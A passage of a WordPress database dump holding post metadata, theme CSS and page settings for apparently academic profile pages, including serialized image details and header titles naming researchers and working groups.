20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(8968,2599,'_edit_lock','1680156737:1'),
(8969,2600,'_wp_attached_file','2022/10/1-8.jpg'),
(8970,2600,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:113;s:6:\"height\";i:165;s:4:\"file\";s:15:\"2022/10/1-8.jpg\";s:8:\"filesize\";i:26979;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"1-8-113x150.jpg\";s:5:\"width\";i:113;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4042;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8971,2599,'_thumbnail_id','2600'),
(8972,2599,'_edit_last','1'),
(8973,2599,'_dt_sidebar_position','disabled'),
(8974,2599,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8975,2599,'_dt_sidebar_hide_on_mobile','0'),
(8976,2599,'_dt_footer_show','1'),
(8977,2599,'_dt_footer_widgetarea_id','sidebar_2'),
(8978,2599,'_dt_footer_hide_on_mobile','0'),
(8979,2599,'_dt_header_title','fancy'),
(8980,2599,'_dt_header_background','normal'),
(8981,2599,'_dt_header_background_below_slideshow','disabled'),
(8982,2599,'_dt_header_transparent_bg_color_scheme','light'),
(8983,2599,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8984,2599,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8985,2599,'_dt_header_transparent_bg_color','#000000'),
(8986,2599,'_dt_header_transparent_bg_opacity','50'),
(8987,2599,'_dt_header_disabled_background','normal'),
(8988,2599,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8989,2599,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8990,2599,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8991,2599,'_dt_header_disabled_transparent_bg_color','#000000'),
(8992,2599,'_dt_header_disabled_transparent_bg_opacity','50'),
(8993,2599,'_dt_page_overrides_top_margin',''),
(8994,2599,'_dt_page_overrides_right_margin',''),
(8995,2599,'_dt_page_overrides_bottom_margin',''),
(8996,2599,'_dt_page_overrides_left_margin',''),
(8997,2599,'_dt_mobile_page_padding_top',''),
(8998,2599,'_dt_mobile_page_padding_right',''),
(8999,2599,'_dt_mobile_page_padding_bottom',''),
(9000,2599,'_dt_mobile_page_padding_left',''),
(9001,2599,'_dt_fancy_header_layout_heading',''),
(9002,2599,'_dt_fancy_header_title_aligment','center'),
(9003,2599,'_dt_fancy_header_height','300'),
(9004,2599,'_dt_fancy_header_padding-top','0px'),
(9005,2599,'_dt_fancy_header_padding-bottom','0px'),
(9006,2599,'_dt_fancy_header_breadcrumbs_heading',''),
(9007,2599,'_dt_fancy_header_breadcrumbs','disabled'),
(9008,2599,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9009,2599,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9010,2599,'_dt_fancy_header_title_heading',''),
(9011,2599,'_dt_fancy_header_title_mode','generic'),
(9012,2599,'_dt_fancy_header_title','Zhizhong Kang China University of Geosciences, China (WG IV/8)'),
(9013,2599,'_dt_fancy_header_title_font_size','30'),
(9014,2599,'_dt_fancy_header_title_line_height','36'),
(9015,2599,'_dt_fancy_header_text_transform','none'),
(9016,2599,'_dt_fancy_header_title_color_mode','color'),
(9017,2599,'_dt_fancy_header_title_color','#ffffff'),
(9018,2599,'_dt_fancy_header_subtitle_heading',''),
(9019,2599,'_dt_fancy_header_subtitle',''),
(9020,2599,'_dt_fancy_header_subtitle_font_size','18'),
(9021,2599,'_dt_fancy_header_subtitle_line_height','26'),
(9022,2599,'_dt_fancy_header_subtitle_text_transform','none'),
(9023,2599,'_dt_fancy_header_subtitle_color_mode','color'),
(9024,2599,'_dt_fancy_header_subtitle_color','#ffffff'),
(9025,2599,'_dt_fancy_header_bg_heading',''),
(9026,2599,'_dt_fancy_header_bg_color','#222222'),
(9027,2599,'_dt_fancy_header_bg_image_origin','custom'),
(9028,2599,'_dt_fancy_header_bg_image','a:0:{}'),
(9029,2599,'_dt_fancy_header_bg_repeat','no-repeat'),
(9030,2599,'_dt_fancy_header_bg_position_x','center'),
(9031,2599,'_dt_fancy_header_bg_position_y','center'),
(9032,2599,'_dt_fancy_header_bg_fullscreen','1'),
(9033,2599,'_dt_fancy_header_bg_overlay','0'),
(9034,2599,'_dt_fancy_header_overlay_color','#000'),
(9035,2599,'_dt_fancy_header_bg_overlay_opacity','50'),
(9036,2599,'_dt_fancy_header_scroll_effect','default'),
(9037,2599,'_dt_fancy_header_bg_parallax','0.5'),
(9038,2599,'_dt_fancy_header_responsiveness_heading',''),
(9039,2599,'_dt_fancy_header_responsiveness','enabled'),
(9040,2599,'_dt_fancy_header_responsiveness_switch','778px'),
(9041,2599,'_dt_fancy_header_responsive_height','70'),
(9042,2599,'_dt_fancy_header_responsive_font_size','30'),
(9043,2599,'_dt_fancy_header_responsive_title_line_height','38'),
(9044,2599,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9045,2599,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9046,2599,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(9047,2599,'_dt_teammate_options_go_to_single','1'),
(9048,2599,'_dt_teammate_options_position',''),
(9049,2599,'_dt_teammate_options_website',''),
(9050,2599,'_dt_teammate_options_mail',''),
(9051,2599,'_dt_teammate_options_facebook',''),
(9052,2599,'_dt_teammate_options_twitter',''),
(9053,2599,'_dt_teammate_options_dribbble',''),
(9054,2599,'_dt_teammate_options_you-tube',''),
(9055,2599,'_dt_teammate_options_rss',''),
(9056,2599,'_dt_teammate_options_delicious',''),
(9057,2599,'_dt_teammate_options_flickr',''),
(9058,2599,'_dt_teammate_options_lastfm',''),
(9059,2599,'_dt_teammate_options_linkedin',''),
(9060,2599,'_dt_teammate_options_vimeo',''),
(9061,2599,'_dt_teammate_options_tumbler',''),
(9062,2599,'_dt_teammate_options_pinterest',''),
(9063,2599,'_dt_teammate_options_devian',''),
(9064,2599,'_dt_teammate_options_skype',''),
(9065,2599,'_dt_teammate_options_github',''),
(9066,2599,'_dt_teammate_options_instagram',''),
(9067,2599,'_dt_teammate_options_stumbleupon',''),
(9068,2599,'_dt_teammate_options_behance',''),
(9069,2599,'_dt_teammate_options_px-500',''),
(9070,2599,'_dt_teammate_options_tripedvisor',''),
(9071,2599,'_dt_teammate_options_vk',''),
(9072,2599,'_dt_teammate_options_foursquare',''),
(9073,2599,'_dt_teammate_options_xing',''),
(9074,2599,'_dt_teammate_options_weibo',''),
(9075,2599,'_dt_teammate_options_odnoklassniki',''),
(9076,2599,'_dt_teammate_options_research-gate',''),
(9077,2599,'_dt_teammate_options_yelp',''),
(9078,2599,'_dt_teammate_options_blogger',''),
(9079,2599,'_dt_teammate_options_soundcloud',''),
(9080,2599,'_dt_teammate_options_viber',''),
(9081,2599,'_dt_teammate_options_whatsapp',''),
(9082,2599,'_dt_teammate_options_reddit',''),
(9083,2599,'_dt_teammate_options_snapchat',''),
(9084,2599,'_dt_teammate_options_telegram',''),
(9085,2599,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9086,2601,'_edit_lock','1680156621:1'),
(9087,2602,'_wp_attached_file','2022/10/co1.jpg'),
(9088,2602,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:104;s:6:\"height\";i:154;s:4:\"file\";s:15:\"2022/10/co1.jpg\";s:8:\"filesize\";i:31944;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"co1-104x150.jpg\";s:5:\"width\";i:104;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4355;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9089,2601,'_thumbnail_id','2602'),
(9090,2601,'_edit_last','1'),
(9091,2601,'_dt_sidebar_position','disabled'),
(9092,2601,'_dt_sidebar_widgetarea_id','sidebar_1'),
(9093,2601,'_dt_sidebar_hide_on_mobile','0'),
(9094,2601,'_dt_footer_show','1'),
(9095,2601,'_dt_footer_widgetarea_id','sidebar_2'),
(9096,2601,'_dt_footer_hide_on_mobile','0'),
(9097,2601,'_dt_header_title','fancy'),
(9098,2601,'_dt_header_background','normal'),
(9099,2601,'_dt_header_background_below_slideshow','disabled'),
(9100,2601,'_dt_header_transparent_bg_color_scheme','light'),
(9101,2601,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(9102,2601,'_dt_header_transparent_top_bar_bg_opacity','25'),
(9103,2601,'_dt_header_transparent_bg_color','#000000'),
(9104,2601,'_dt_header_transparent_bg_opacity','50'),
(9105,2601,'_dt_header_disabled_background','normal'),
(9106,2601,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(9107,2601,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(9108,2601,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(9109,2601,'_dt_header_disabled_transparent_bg_color','#000000'),
(9110,2601,'_dt_header_disabled_transparent_bg_opacity','50'),
(9111,2601,'_dt_page_overrides_top_margin',''),
(9112,2601,'_dt_page_overrides_right_margin',''),
(9113,2601,'_dt_page_overrides_bottom_margin',''),
(9114,2601,'_dt_page_overrides_left_margin',''),
(9115,2601,'_dt_mobile_page_padding_top',''),
(9116,2601,'_dt_mobile_page_padding_right',''),
(9117,2601,'_dt_mobile_page_padding_bottom',''),
(9118,2601,'_dt_mobile_page_padding_left',''),
(9119,2601,'_dt_fancy_header_layout_heading',''),
(9120,2601,'_dt_fancy_header_title_aligment','center'),
(9121,2601,'_dt_fancy_header_height','300'),
(9122,2601,'_dt_fancy_header_padding-top','0px'),
(9123,2601,'_dt_fancy_header_padding-bottom','0px'),
(9124,2601,'_dt_fancy_header_breadcrumbs_heading',''),
(9125,2601,'_dt_fancy_header_breadcrumbs','disabled'),
(9126,2601,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9127,2601,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9128,2601,'_dt_fancy_header_title_heading',''),
(9129,2601,'_dt_fancy_header_title_mode','custom'),
(9130,2601,'_dt_fancy_header_title','Prof. Mir Abolfazl Mostafavi '),
(9131,2601,'_dt_fancy_header_title_font_size','30'),
(9132,2601,'_dt_fancy_header_title_line_height','36'),
(9133,2601,'_dt_fancy_header_text_transform','none'),
(9134,2601,'_dt_fancy_header_title_color_mode','color'),
(9135,2601,'_dt_fancy_header_title_color','#ffffff'),
(9136,2601,'_dt_fancy_header_subtitle_heading',''),
(9137,2601,'_dt_fancy_header_subtitle',''),
(9138,2601,'_dt_fancy_header_subtitle_font_size','18'),
(9139,2601,'_dt_fancy_header_subtitle_line_height','26'),
(9140,2601,'_dt_fancy_header_subtitle_text_transform','none'),
(9141,2601,'_dt_fancy_header_subtitle_color_mode','color'),
(9142,2601,'_dt_fancy_header_subtitle_color','#ffffff'),
(9143,2601,'_dt_fancy_header_bg_heading',''),
(9144,2601,'_dt_fancy_header_bg_color','#222222'),
(9145,2601,'_dt_fancy_header_bg_image_origin','custom'),
(9146,2601,'_dt_fancy_header_bg_image','a:0:{}'),
(9147,2601,'_dt_fancy_header_bg_repeat','no-repeat'),
(9148,2601,'_dt_fancy_header_bg_position_x','center'),
(9149,2601,'_dt_fancy_header_bg_position_y','center'),
(9150,2601,'_dt_fancy_header_bg_fullscreen','1'),
(9151,2601,'_dt_fancy_header_bg_overlay','0'),
(9152,2601,'_dt_fancy_header_overlay_color','#000'),
(9153,2601,'_dt_fancy_header_bg_overlay_opacity','50'),
(9154,2601,'_dt_fancy_header_scroll_effect','default'),
(9155,2601,'_dt_fancy_header_bg_parallax','0.5'),
(9156,2601,'_dt_fancy_header_responsiveness_heading',''),
(9157,2601,'_dt_fancy_header_responsiveness','enabled'),
(9158,2601,'_dt_fancy_header_responsiveness_switch','778px'),
(9159,2601,'_dt_fancy_header_responsive_height','70'),
(9160,2601,'_dt_fancy_header_responsive_font_size','30'),
(9161,2601,'_dt_fancy_header_responsive_title_line_height','38'),
(9162,2601,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9163,2601,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9164,2601,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(9165,2601,'_dt_teammate_options_go_to_single','1'),
(9166,2601,'_dt_teammate_options_position',''),
(9167,2601,'_dt_teammate_options_website',''),
(9168,2601,'_dt_teammate_options_mail',''),
(9169,2601,'_dt_teammate_options_facebook',''),
(9170,2601,'_dt_teammate_options_twitter',''),
(9171,2601,'_dt_teammate_options_dribbble',''),
(9172,2601,'_dt_teammate_options_you-tube',''),
(9173,2601,'_dt_teammate_options_rss',''),
(9174,2601,'_dt_teammate_options_delicious',''),
(9175,2601,'_dt_teammate_options_flickr',''),
(9176,2601,'_dt_teammate_options_lastfm',''),
(9177,2601,'_dt_teammate_options_linkedin',''),
(9178,2601,'_dt_teammate_options_vimeo',''),
(9179,2601,'_dt_teammate_options_tumbler',''),
(9180,2601,'_dt_teammate_options_pinterest',''),
(9181,2601,'_dt_teammate_options_devian',''),
(9182,2601,'_dt_teammate_options_skype',''),
(9183,2601,'_dt_teammate_options_github',''),
(9184,2601,'_dt_teammate_options_instagram',''),
(9185,2601,'_dt_teammate_options_stumbleupon',''),
(9186,2601,'_dt_teammate_options_behance',''),
(9187,2601,'_dt_teammate_options_px-500',''),
(9188,2601,'_dt_teammate_options_tripedvisor',''),
(9189,2601,'_dt_teammate_options_vk',''),
(9190,2601,'_dt_teammate_options_foursquare',''),
(9191,2601,'_dt_teammate_options_xing',''),
(9192,2601,'_dt_teammate_options_weibo',''),
(9193,2601,'_dt_teammate_options_odnoklassniki',''),
(9194,2601,'_dt_teammate_options_research-gate',''),
(9195,2601,'_dt_teammate_options_yelp',''),
(9196,2601,'_dt_teammate_options_blogger',''),
(9197,2601,'_dt_teammate_options_soundcloud',''),
(9198,2601,'_dt_teammate_options_viber',''),
(9199,2601,'_dt_teammate_options_whatsapp',''),
(9200,2601,'_dt_teammate_options_reddit',''),
(9201,2601,'_dt_teammate_options_snapchat',''),
(9202,2601,'_dt_teammate_options_telegram',''),
(9203,2601,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9204,2603,'_edit_lock','1680156802:1'),
(9205,2604,'_wp_attached_file','2022/10/co2.jpg'),
(9206,2604,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:126;s:6:\"height\";i:153;s:4:\"file\";s:15:\"2022/10/co2.jpg\";s:8:\"filesize\";i:40549;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"co2-126x150.jpg\";s:5:\"width\";i:126;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6083;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9207,2603,'_thumbnail_id','2604'),
(9208,2603,'_edit_last','1'),
(9209,2603,'_dt_sidebar_position','disabled'),
(9210,2603,'_dt_sidebar_widgetarea_id','sidebar_1'),
(9211,2603,'_dt_sidebar_hide_on_mobile','0'),
(9212,2603,'_dt_footer_show','1'),
(9213,2603,'_dt_footer_widgetarea_id','sidebar_2'),
(9214,2603,'_dt_footer_hide_on_mobile','0'),
(9215,2603,'_dt_header_title','fancy'),
(9216,2603,'_dt_header_background','normal'),
(9217,2603,'_dt_header_background_below_slideshow','disabled'),
(9218,2603,'_dt_header_transparent_bg_color_scheme','light'),
(9219,2603,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(9220,2603,'_dt_header_transparent_top_bar_bg_opacity','25'),
(9221,2603,'_dt_header_transparent_bg_color','#000000'),
(9222,2603,'_dt_header_transparent_bg_opacity','50'),
(9223,2603,'_dt_header_disabled_background','normal'),
(9224,2603,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(9225,2603,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(9226,2603,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(9227,2603,'_dt_header_disabled_transparent_bg_color','#000000'),
(9228,2603,'_dt_header_disabled_transparent_bg_opacity','50'),
(9229,2603,'_dt_page_overrides_top_margin',''),
(9230,2603,'_dt_page_overrides_right_margin',''),
(9231,2603,'_dt_page_overrides_bottom_margin',''),
(9232,2603,'_dt_page_overrides_left_margin',''),
(9233,2603,'_dt_mobile_page_padding_top',''),
(9234,2603,'_dt_mobile_page_padding_right',''),
(9235,2603,'_dt_mobile_page_padding_bottom',''),
(9236,2603,'_dt_mobile_page_padding_left',''),
(9237,2603,'_dt_fancy_header_layout_heading',''),
(9238,2603,'_dt_fancy_header_title_aligment','center'),
(9239,2603,'_dt_fancy_header_height','300'),
(9240,2603,'_dt_fancy_header_padding-top','0px'),
(9241,2603,'_dt_fancy_header_padding-bottom','0px'),
(9242,2603,'_dt_fancy_header_breadcrumbs_heading',''),
(9243,2603,'_dt_fancy_header_breadcrumbs','disabled'),
(9244,2603,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9245,2603,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9246,2603,'_dt_fancy_header_title_heading',''),
(9247,2603,'_dt_fancy_header_title_mode','generic'),
(9248,2603,'_dt_fancy_header_title','Ana-Maria Olteanu-Raimond              University Gustave Eiffel, France  (WG IV/4)'),
(9249,2603,'_dt_fancy_header_title_font_size','30'),
(9250,2603,'_dt_fancy_header_title_line_height','36'),
(9251,2603,'_dt_fancy_header_text_transform','none'),
(9252,2603,'_dt_fancy_header_title_color_mode','color'),
(9253,2603,'_dt_fancy_header_title_color','#ffffff'),
(9254,2603,'_dt_fancy_header_subtitle_heading',''),
(9255,2603,'_dt_fancy_header_subtitle',''),
(9256,2603,'_dt_fancy_header_subtitle_font_size','18'),
(9257,2603,'_dt_fancy_header_subtitle_line_height','26'),
(9258,2603,'_dt_fancy_header_subtitle_text_transform','none'),
(9259,2603,'_dt_fancy_header_subtitle_color_mode','color'),
(9260,2603,'_dt_fancy_header_subtitle_color','#ffffff'),
(9261,2603,'_dt_fancy_header_bg_heading',''),
(9262,2603,'_dt_fancy_header_bg_color','#222222'),
(9263,2603,'_dt_fancy_header_bg_image_origin','custom'),
(9264,2603,'_dt_fancy_header_bg_image','a:0:{}'),
